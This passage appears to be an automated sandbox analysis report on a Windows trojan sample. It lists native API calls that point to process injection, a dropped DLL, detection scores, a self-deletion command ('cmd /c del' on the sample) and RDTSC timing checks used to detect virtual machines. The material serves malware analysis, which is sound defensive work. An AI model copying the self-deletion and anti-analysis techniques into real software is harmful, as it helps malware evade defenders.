Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_0041CBF5
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00408C3A
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00408C80
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_0041C48C
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_0041BDD0
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00402D90
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_0041CF88
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00402FB0
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B320A0
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BD20A8
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B1B090
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BD28EC
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BDE824
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BC1002
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B24120
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B0F900
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BD22AE
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B3EBB0
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BC03DA
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BCDBD2
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BD2B28
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B1841F
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BCD466
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B32581
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B1D5E0
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BD25DD
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B00D20
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BD2D07
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BD1D55
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BD2EF7
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B26E30
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BCD616
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BD1FF1
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00BDDFCE
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_00401030
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_00401175
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_0041C997
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_0041BB46
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_0041CBF5
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_00408C3A
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_00408C80
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_0041C48C
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_0041BDD0
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_00402D90
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_0041CF88
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_1_00402FB0
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054E1D55
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054E2D07
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_05410D20
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054E25DD
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_0542D5E0
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_05442581
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054DD466
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_0542841F
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054EDFCE
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054E1FF1
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054DD616
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_05436E30
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054E2EF7
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_0541F900
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_05434120
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054399BF
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054D1002
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054EE824
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_0543A830
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054E28EC
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_0542B090
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054420A0
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054E20A8
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_0543AB40
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054E2B28
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054D03DA
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054DDBD2
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_0544EBB0
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054CFA2B
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_054E22AE
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_0123C997
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_0123CBF5
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_01222D90
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_01228C3A
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_01228C80
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_01222FB0
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 6_2_0123CF88
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: String function: 0041A390 appears 38 times
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: String function: 0041A4C0 appears 38 times
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: String function: 00B0B150 appears 39 times
Source: C:\Windows\SysWOW64\cscript.exe; Code function: String function: 0541B150 appears 66 times
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_004185E0 NtCreateFile,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00418690 NtReadFile,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00418710 NtClose,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_004187C0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_004185DA NtCreateFile,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B498F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B49860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B49840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B499A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B49A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00B49A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B495D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B497A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B498A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B499D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B495F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49560 NtWriteFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B496D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00418710 NtClose,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004185DA NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012385E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01238710 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012387C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01238690 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012385DA NtCreateFile,
          Source: Y1p8VPvyU2.exe, 00000000.00000003.302983969.0000000002D1F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000000.00000003.304611103.0000000002B86000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.362160211.0000000000D8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll 13FA843E8D2B2E3A9699F9F71A8AD152EA94995B1045891B6B91CFA9674B69F8
          Source: Y1p8VPvyU2.exeVirustotal: Detection: 35%
          Source: Y1p8VPvyU2.exeReversingLabs: Detection: 64%
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile read: C:\Users\user\Desktop\Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile created: C:\Users\user\AppData\Local\Temp\nso1022.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@7/3
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: cscript.pdbUGP source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Y1p8VPvyU2.exe, 00000000.00000003.303889590.0000000002C00000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000000.00000003.304490729.0000000002A70000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y1p8VPvyU2.exe, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: cscript.pdb source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10023581 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10023600 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10013245 push ecx; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00415094 push ds; iretd
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041A269 push ebx; retf
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004044C6 push eax; retf
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B7D5 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B5D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00415094 push ds; iretd
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041A269 push ebx; retf
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004044C6 push eax; retf
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B7D5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0546D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B822 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B82B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B88C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01235094 push ds; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123A269 push ebx; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012244C6 push eax; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123C750 push es; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B7D5 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: Y1p8VPvyU2.exeStatic PE information: real checksum: 0x0 should be: 0x5d471
          Source: msvofdls.dll.0.drStatic PE information: real checksum: 0x30354 should be: 0x25b81
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile created: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000001228604 second address: 000000000122860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000122899E second address: 00000000012289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6672Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402630 FindFirstFileA,
